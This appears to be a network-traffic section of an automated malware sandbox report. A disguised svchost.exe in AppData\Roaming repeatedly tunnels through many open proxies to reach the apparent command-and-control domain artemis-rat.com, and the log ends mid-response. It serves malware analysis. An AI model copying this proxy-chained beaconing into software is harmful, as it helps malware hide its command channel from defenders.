                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2365192.168.2.557529121.128.194.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.934180975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2366192.168.2.557733172.67.182.488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.941833973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.098494053 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2367192.168.2.55739290.188.250.168043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.943708897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2368192.168.2.55661754.38.176.2002659143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.954502106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.145993948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942884922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2369192.168.2.55749731.44.82.23808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.954550028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.833126068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.942877054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146213055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333832026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2370192.168.2.55754784.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.954634905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2371192.168.2.5575018.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.962769032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2372192.168.2.557581211.222.252.1878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.963926077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2373192.168.2.5575688.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.976150990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2374192.168.2.55759516.162.211.90108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.979568005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2375192.168.2.557552210.4.194.1968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.985683918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2376192.168.2.557713129.213.150.205808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.993226051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2377192.168.2.557599128.199.187.208800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.000277042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2378192.168.2.55759047.74.152.29888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.002176046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.833230972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2379192.168.2.557781104.25.114.288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.054327011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.208513021 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2380192.168.2.556618103.23.100.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.054490089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2381192.168.2.55661652.80.19.207312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.054512978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.879925013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880914927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974251032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2382192.168.2.557609202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.055172920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2383192.168.2.55761143.131.242.1621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.055886984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2384192.168.2.556691112.78.170.252567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.056875944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2385192.168.2.557667198.105.100.156640743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.056911945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.344242096 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2386192.168.2.557614193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.057282925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2387192.168.2.557643144.76.96.180556643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.057290077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.365627050 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2388192.168.2.557528103.153.154.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.057337999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.470474005 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2389192.168.2.557776104.16.109.2078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.058685064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.213365078 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2390192.168.2.55783123.227.38.2308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.059041023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.213505030 CET316INHTTP/1.1 400 Bad Request
